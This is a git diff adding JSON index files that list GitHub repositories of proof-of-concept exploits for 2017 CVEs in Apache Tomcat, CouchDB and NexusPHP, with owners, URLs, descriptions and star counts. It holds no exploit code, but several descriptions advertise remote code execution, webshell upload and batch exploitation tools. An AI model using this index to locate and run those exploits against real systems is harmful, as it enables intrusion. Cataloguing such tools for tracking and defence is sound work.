false, + "created_at": "2017-09-23T06:15:48Z", + "updated_at": "2024-10-24T16:20:02Z", + "pushed_at": "2022-10-09T12:13:03Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 113, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 104743685, + "name": "cve-2017-12615", + "full_name": "mefulton\/cve-2017-12615", + "owner": { + "login": "mefulton", + "id": 27797094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27797094?v=4", + "html_url": "https:\/\/github.com\/mefulton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mefulton\/cve-2017-12615", + "description": "just a python script for cve-2017-12615", + "fork": false, + "created_at": "2017-09-25T11:53:02Z", + "updated_at": "2022-03-26T11:12:55Z", + "pushed_at": "2017-10-01T08:13:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 106053959, + "name": "POC-CVE-2017-12615-or-CVE-2017-12717", + "full_name": "zi0Black\/POC-CVE-2017-12615-or-CVE-2017-12717", + "owner": { + "login": "zi0Black", + "id": 13380579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13380579?v=4", + "html_url": "https:\/\/github.com\/zi0Black", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zi0Black\/POC-CVE-2017-12615-or-CVE-2017-12717", + "description": "CVE-2017-12617 and CVE-2017-12615 for tomcat server", + "fork": false, + "created_at": "2017-10-06T22:04:23Z", + "updated_at": "2022-08-03T10:06:01Z", + "pushed_at": "2017-10-10T14:23:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 109152824, + "name": "cve-2017-12615", + "full_name": "wsg00d\/cve-2017-12615", + "owner": { + "login": "wsg00d", + "id": 20575929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20575929?v=4", + "html_url": "https:\/\/github.com\/wsg00d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsg00d\/cve-2017-12615", + "description": "tomcat-put-cve-2017-12615", + "fork": false, + "created_at": "2017-11-01T16:05:32Z", + "updated_at": "2018-04-30T18:16:21Z", + "pushed_at": "2017-11-01T16:12:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 112277075, + "name": "CVE-2017-12615", + "full_name": "BeyondCy\/CVE-2017-12615", + "owner": { + "login": "BeyondCy", + "id": 4694785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4694785?v=4", + "html_url": "https:\/\/github.com\/BeyondCy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeyondCy\/CVE-2017-12615", + "description": "Tomcat 远程代码执行漏洞 Exploit", + "fork": false, + "created_at": "2017-11-28T02:51:16Z", + "updated_at": "2022-02-22T06:00:01Z", + "pushed_at": "2017-10-18T13:15:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 115383252, + "name": "CVE-2017-12615", + "full_name": "1337g\/CVE-2017-12615", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-12615", + "description": "CVE-2017-12615 Tomcat RCE (TESTED)", + "fork": false, + "created_at": "2017-12-26T03:48:14Z", + "updated_at": "2024-08-09T17:05:48Z", + "pushed_at": "2017-12-26T12:38:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 127641351, + "name": "CVE-2017-12615", + "full_name": "Shellkeys\/CVE-2017-12615", + "owner": { + "login": "Shellkeys", + "id": 33480760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33480760?v=4", + "html_url": "https:\/\/github.com\/Shellkeys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shellkeys\/CVE-2017-12615", + "description": "tomcat7.x远程命令执行", + "fork": false, + "created_at": "2018-04-01T15:22:51Z", + "updated_at": "2018-04-01T15:22:51Z", + "pushed_at": "2018-04-01T15:22:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 166267639, + "name": "cve-2017-12615", + "full_name": "cved-sources\/cve-2017-12615", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-12615", + "description": "cve-2017-12615", + "fork": false, + "created_at": "2019-01-17T17:30:03Z", + "updated_at": "2021-04-15T21:24:26Z", + "pushed_at": "2021-04-15T21:24:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 235126563, + "name": "CVE-2017-12615", + "full_name": "ianxtianxt\/CVE-2017-12615", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2017-12615", + "description": "CVE-2017-12615 批量脚本", + "fork": false, + "created_at": "2020-01-20T14:56:05Z", + "updated_at": "2024-08-12T19:56:50Z", + "pushed_at": "2020-01-20T15:47:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 274770919, + "name": "Tomcat-CVE-2017-12615", + "full_name": "cyberharsh\/Tomcat-CVE-2017-12615", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/Tomcat-CVE-2017-12615", + "description": null, + "fork": false, + "created_at": "2020-06-24T21:14:41Z", + "updated_at": "2020-06-25T08:15:21Z", + "pushed_at": "2020-06-25T08:15:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328929654, + "name": "CVE-2017-12615-EXP", + "full_name": "w0x68y\/CVE-2017-12615-EXP", + "owner": { + "login": "w0x68y", + "id": 22195911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22195911?v=4", + "html_url": "https:\/\/github.com\/w0x68y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0x68y\/CVE-2017-12615-EXP", + "description": "CVE-2017-12615 任意文件写入exp,写入webshell", + "fork": false, + "created_at": "2021-01-12T09:07:12Z", + "updated_at": "2022-10-23T07:40:44Z", + "pushed_at": "2021-01-13T03:23:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565419626, + "name": "AttackTomcat", + "full_name": "tpt11fb\/AttackTomcat", + "owner": { + "login": "tpt11fb", + "id": 80188324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80188324?v=4", + "html_url": "https:\/\/github.com\/tpt11fb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tpt11fb\/AttackTomcat", + "description": "Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取\/包含", + "fork": false, + "created_at": "2022-11-13T11:01:41Z", + "updated_at": "2024-11-21T08:56:26Z", + "pushed_at": "2022-11-15T09:05:50Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 203, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 612301187, + "name": "Tomcat_PUT_GUI_EXP", + "full_name": "xiaokp7\/Tomcat_PUT_GUI_EXP", + "owner": { + "login": "xiaokp7", + "id": 105373673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105373673?v=4", + "html_url": "https:\/\/github.com\/xiaokp7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaokp7\/Tomcat_PUT_GUI_EXP", + "description": "Tomcat PUT方法任意文件写入(CVE-2017-12615)exp", + "fork": false, + "created_at": "2023-03-10T16:26:45Z", + "updated_at": "2024-04-18T01:26:02Z", + "pushed_at": "2023-03-14T07:39:41Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849195359, + "name": "TomcatScanPro", + "full_name": "lizhianyuguangming\/TomcatScanPro", + "owner": { + "login": "lizhianyuguangming", + "id": 81677104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81677104?v=4", + "html_url": "https:\/\/github.com\/lizhianyuguangming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lizhianyuguangming\/TomcatScanPro", + "description": "tomcat自动化漏洞扫描利用工具,支持批量弱口令检测、后台部署war包getshell、CVE-2017-12615 文件上传、CVE-2020-1938\/CNVD-2020-10487 文件包含", + "fork": false, + "created_at": "2024-08-29T06:38:16Z", + "updated_at": "2024-11-28T12:25:23Z", + "pushed_at": "2024-11-13T03:12:58Z", + "stargazers_count": 151, + "watchers_count": 151, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "hacker", + "hackertools", + "penetration-testing-tools", + "scan", + "scanner-web", + "tomcat", + "tools" + ], + "visibility": "public", + "forks": 14, + "watchers": 151, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 890907241, + "name": "CVE-2017-12615-poc", + "full_name": "wudidwo\/CVE-2017-12615-poc", + "owner": { + "login": "wudidwo", + "id": 121968635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121968635?v=4", + "html_url": "https:\/\/github.com\/wudidwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudidwo\/CVE-2017-12615-poc", + "description": null, + "fork": false, + "created_at": "2024-11-19T11:47:11Z", + "updated_at": "2024-11-19T11:49:29Z", + "pushed_at": "2024-11-19T11:49:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12617.json b/2017/CVE-2017-12617.json new file mode 100644 index 0000000000..7422520f75 --- /dev/null +++ b/2017/CVE-2017-12617.json @@ -0,0 +1,318 @@ +[ + { + "id": 105951164, + "name": "CVE-2017-12617", + "full_name": "cyberheartmi9\/CVE-2017-12617", + "owner": { + "login": "cyberheartmi9", + "id": 12415756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12415756?v=4", + "html_url": "https:\/\/github.com\/cyberheartmi9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberheartmi9\/CVE-2017-12617", + "description": "Apache Tomcat < 9.0.1 (Beta) \/ < 8.5.23 \/ < 8.0.47 \/ < 7.0.8 - JSP Upload Bypass \/ Remote Code Execution ", + "fork": false, + "created_at": "2017-10-05T23:41:52Z", + "updated_at": "2024-10-25T18:17:53Z", + "pushed_at": "2017-10-11T07:43:50Z", + "stargazers_count": 390, + "watchers_count": 390, + "has_discussions": false, + "forks_count": 121, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 121, + "watchers": 390, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 120838002, + "name": "CVE-2017-12617", + "full_name": "devcoinfet\/CVE-2017-12617", + "owner": { + "login": "devcoinfet", + "id": 34756993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34756993?v=4", + "html_url": "https:\/\/github.com\/devcoinfet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devcoinfet\/CVE-2017-12617", + "description": "Code put together from a few peoples ideas credit given don't use maliciously please", + "fork": false, + "created_at": "2018-02-09T01:02:32Z", + "updated_at": "2018-02-09T01:04:38Z", + "pushed_at": "2018-02-09T01:04:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 162421259, + "name": "CVE-2017-12617", + "full_name": "qiantu88\/CVE-2017-12617", + "owner": { + "login": "qiantu88", + "id": 35452263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35452263?v=4", + "html_url": "https:\/\/github.com\/qiantu88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiantu88\/CVE-2017-12617", + "description": null, + "fork": false, + "created_at": "2018-12-19T10:26:33Z", + "updated_at": "2018-12-19T10:27:18Z", + "pushed_at": "2018-12-19T10:27:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 165734023, + "name": "CVE-2017-12617", + "full_name": "ygouzerh\/CVE-2017-12617", + "owner": { + "login": "ygouzerh", + "id": 33725211, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33725211?v=4", + "html_url": "https:\/\/github.com\/ygouzerh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ygouzerh\/CVE-2017-12617", + "description": "Proof of Concept - RCE Exploitation : Web Shell on Apache Tomcat - Ensimag January 2018", + "fork": false, + "created_at": "2019-01-14T20:58:29Z", + "updated_at": "2020-05-30T11:09:08Z", + "pushed_at": "2019-01-14T21:57:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-12617", + "francais", + "remote-code-execution", + "security-vulnerability", + "tomcat" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335837615, + "name": "tomcat-cve-2017-12617", + "full_name": "tyranteye666\/tomcat-cve-2017-12617", + "owner": { + "login": "tyranteye666", + "id": 69487631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69487631?v=4", + "html_url": "https:\/\/github.com\/tyranteye666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tyranteye666\/tomcat-cve-2017-12617", + "description": "Apache Tomcat < 9.0.1 (Beta) \/ < 8.5.23 \/ < 8.0.47 \/ < 7.0.8 - JSP Upload Bypass \/ Remote Code Execution for Python3", + "fork": false, + "created_at": "2021-02-04T04:28:21Z", + "updated_at": "2021-07-03T19:27:11Z", + "pushed_at": "2021-07-03T19:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389986666, + "name": "tc_hack", + "full_name": "jptr218\/tc_hack", + "owner": { + "login": "jptr218", + "id": 84092766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jptr218\/tc_hack", + "description": "An implementation of CVE-2017-12617", + "fork": false, + "created_at": "2021-07-27T13:06:16Z", + "updated_at": "2021-07-27T13:17:14Z", + "pushed_at": "2021-07-27T13:10:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437128925, + "name": "CVE-2017-12617", + "full_name": "LongWayHomie\/CVE-2017-12617", + "owner": { + "login": "LongWayHomie", + "id": 63229183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4", + "html_url": "https:\/\/github.com\/LongWayHomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2017-12617", + "description": "CVE-2017-12617 is a critical vulnerability leading to Remote Code Execution (RCE) in Apache Tomcat.", + "fork": false, + "created_at": "2021-12-10T22:21:07Z", + "updated_at": "2024-08-14T13:33:50Z", + "pushed_at": "2021-12-11T14:07:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774024446, + "name": "CVE-2017-12617-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2017-12617-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2017-12617-EXPLOIT", + "description": null, + "fork": false, + "created_at": "2024-03-18T20:10:46Z", + "updated_at": "2024-03-18T20:12:51Z", + "pushed_at": "2024-03-18T20:12:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821301173, + "name": "CVE-2017-12617", + "full_name": "scirusvulgaris\/CVE-2017-12617", + "owner": { + "login": "scirusvulgaris", + "id": 31921057, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31921057?v=4", + "html_url": "https:\/\/github.com\/scirusvulgaris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scirusvulgaris\/CVE-2017-12617", + "description": null, + "fork": false, + "created_at": "2024-06-28T08:33:41Z", + "updated_at": "2024-06-28T08:37:21Z", + "pushed_at": "2024-06-28T08:37:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824008001, + "name": "CVE-2017-12617", + "full_name": "yZ1337\/CVE-2017-12617", + "owner": { + "login": "yZ1337", + "id": 32521997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32521997?v=4", + "html_url": "https:\/\/github.com\/yZ1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yZ1337\/CVE-2017-12617", + "description": "CVE-2017-12617", + "fork": false, + "created_at": "2024-07-04T07:23:39Z", + "updated_at": "2024-07-04T07:25:34Z", + "pushed_at": "2024-07-04T07:25:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12624.json b/2017/CVE-2017-12624.json new file mode 100644 index 0000000000..4be2708806 --- /dev/null +++ b/2017/CVE-2017-12624.json @@ -0,0 +1,33 @@ +[ + { + "id": 158200351, + "name": "CVE-2017-12624", + "full_name": "tafamace\/CVE-2017-12624", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2017-12624", + "description": null, + "fork": false, + "created_at": "2018-11-19T10:07:55Z", + "updated_at": "2018-11-19T10:20:47Z", + "pushed_at": "2018-11-19T10:20:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12635.json b/2017/CVE-2017-12635.json new file mode 100644 index 0000000000..e27e2e5b04 --- /dev/null +++ b/2017/CVE-2017-12635.json @@ -0,0 +1,95 @@ +[ + { + "id": 220319165, + "name": "CVE-2017-12635", + "full_name": "assalielmehdi\/CVE-2017-12635", + "owner": { + "login": "assalielmehdi", + "id": 23085816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23085816?v=4", + "html_url": "https:\/\/github.com\/assalielmehdi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/assalielmehdi\/CVE-2017-12635", + "description": "Case study and POC of CVE-2017-12635: Apache CouchDB 1.7.0 \/ 2.x < 2.1.1 - Remote Privilege Escalation", + "fork": false, + "created_at": "2019-11-07T20:02:31Z", + "updated_at": "2024-02-24T11:42:15Z", + "pushed_at": "2019-12-15T15:19:00Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 273583832, + "name": "Apache-couchdb-CVE-2017-12635", + "full_name": "cyberharsh\/Apache-couchdb-CVE-2017-12635", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/Apache-couchdb-CVE-2017-12635", + "description": null, + "fork": false, + "created_at": "2020-06-19T20:48:28Z", + "updated_at": "2021-12-24T15:27:36Z", + "pushed_at": "2020-08-17T08:39:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880892128, + "name": "CVE-2017-12635-POC", + "full_name": "Weisant\/CVE-2017-12635-POC", + "owner": { + "login": "Weisant", + "id": 100367409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100367409?v=4", + "html_url": "https:\/\/github.com\/Weisant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Weisant\/CVE-2017-12635-POC", + "description": "POC for CouchDB CVE-2017-12635", + "fork": false, + "created_at": "2024-10-30T14:52:35Z", + "updated_at": "2024-10-31T09:03:17Z", + "pushed_at": "2024-10-31T08:59:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12636.json b/2017/CVE-2017-12636.json new file mode 100644 index 0000000000..5e66469c01 --- /dev/null +++ b/2017/CVE-2017-12636.json @@ -0,0 +1,64 @@ +[ + { + "id": 146091131, + "name": "CVE-2017-12636", + "full_name": "moayadalmalat\/CVE-2017-12636", + "owner": { + "login": "moayadalmalat", + "id": 42471675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42471675?v=4", + "html_url": "https:\/\/github.com\/moayadalmalat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moayadalmalat\/CVE-2017-12636", + "description": null, + "fork": false, + "created_at": "2018-08-25T11:50:22Z", + "updated_at": "2022-09-28T01:54:37Z", + "pushed_at": "2018-08-25T12:01:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 249396383, + "name": "CVE-2017-12636", + "full_name": "XTeam-Wing\/CVE-2017-12636", + "owner": { + "login": "XTeam-Wing", + "id": 25416365, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25416365?v=4", + "html_url": "https:\/\/github.com\/XTeam-Wing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XTeam-Wing\/CVE-2017-12636", + "description": "CVE-2017-12636|exploit Couchdb ", + "fork": false, + "created_at": "2020-03-23T10:11:04Z", + "updated_at": "2024-08-12T19:59:09Z", + "pushed_at": "2020-03-23T10:15:21Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12792.json b/2017/CVE-2017-12792.json new file mode 100644 index 0000000000..d35cfc5479 --- /dev/null +++ b/2017/CVE-2017-12792.json @@ -0,0 +1,33 @@ +[ + { + "id": 107090388, + "name": "cve-2017-12792", + "full_name": "ZZS2017\/cve-2017-12792", + "owner": { + "login": "ZZS2017", + "id": 30464951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30464951?v=4", + "html_url": "https:\/\/github.com\/ZZS2017", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZS2017\/cve-2017-12792", + "description": "NexusPHP CSRF+XSS", + "fork": false, + "created_at": "2017-10-16T07:06:19Z", + "updated_at": "2019-11-21T10:28:20Z", + "pushed_at": "2017-08-21T09:38:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12852.json b/2017/CVE-2017-12852.json new file mode 100644 index 0000000000..6870fd2d37 --- /dev/null +++ b/2017/CVE-2017-12852.json @@ -0,0 +1,33 @@ +[ + { + "id": 105343958, + "name": "numpy-1.13.1", + "full_name": "BT123\/numpy-1.13.1", + "owner": { + "login": "BT123", + "id": 9165608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9165608?v=4", + "html_url": "https:\/\/github.com\/BT123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BT123\/numpy-1.13.1", + "description": "test the CVE-2017-12852 in numpy v1.13.1 and v1.13.3 has fixed the bug ", + "fork": false, + "created_at": "2017-09-30T05:21:48Z", + "updated_at": "2017-11-03T06:18:22Z", + "pushed_at": "2017-10-20T03:34:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12943.json b/2017/CVE-2017-12943.json new file mode 100644 index 0000000000..12fd439384 --- /dev/null +++ 